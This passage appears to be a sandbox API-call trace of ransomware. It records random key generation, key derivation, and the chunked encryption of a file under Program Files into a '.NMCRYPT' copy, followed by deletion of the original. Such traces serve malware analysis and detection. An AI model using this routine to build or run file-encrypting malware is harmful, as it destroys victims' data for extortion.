(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.590] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.591] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.591] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.592] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44498c | out: phHash=0x1d44498c) returned 1 [0147.592] CryptHashData (hHash=0x9ad238, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.592] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d444990 | out: phKey=0x1d444990*=0x9ad338) returned 1 [0147.592] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.592] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.592] wcslen (_String="\\\\?\\") returned 0x4 [0147.592] CryptDuplicateKey (in: hKey=0x9ad338, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad138) returned 1 [0147.592] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.592] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.592] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2570) returned 1 [0147.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.593] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.594] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.594] GetLastError () returned 0x0 [0147.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.595] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.595] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.595] GetLastError () returned 0x0 [0147.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.595] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.595] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.595] GetLastError () returned 0x0 [0147.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.595] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.595] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.595] GetLastError () returned 0x0 [0147.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.595] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.595] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.596] GetLastError () returned 0x0 [0147.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.596] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.596] GetLastError () returned 0x0 [0147.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.596] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.596] GetLastError () returned 0x0 [0147.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.596] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.596] GetLastError () returned 0x0 [0147.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.596] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.596] GetLastError () returned 0x0 [0147.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.596] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.596] GetLastError () returned 0x0 [0147.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xa, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xa, lpOverlapped=0x0) returned 1 [0147.596] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xa, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x10) returned 1 [0147.596] GetLastError () returned 0x0 [0147.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x10, lpOverlapped=0x0) returned 1 [0147.597] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml")) returned 0x20 [0147.597] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml", dwFileAttributes=0x20) returned 0 [0147.597] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml") returned 1 [0147.597] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml")) returned 0 [0147.597] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" [0147.597] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.597] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB36F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb36f.tmp")) returned 0xb36f [0147.598] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB36F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb36f.tmp"), dwFlags=0x1) returned 0 [0147.598] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft 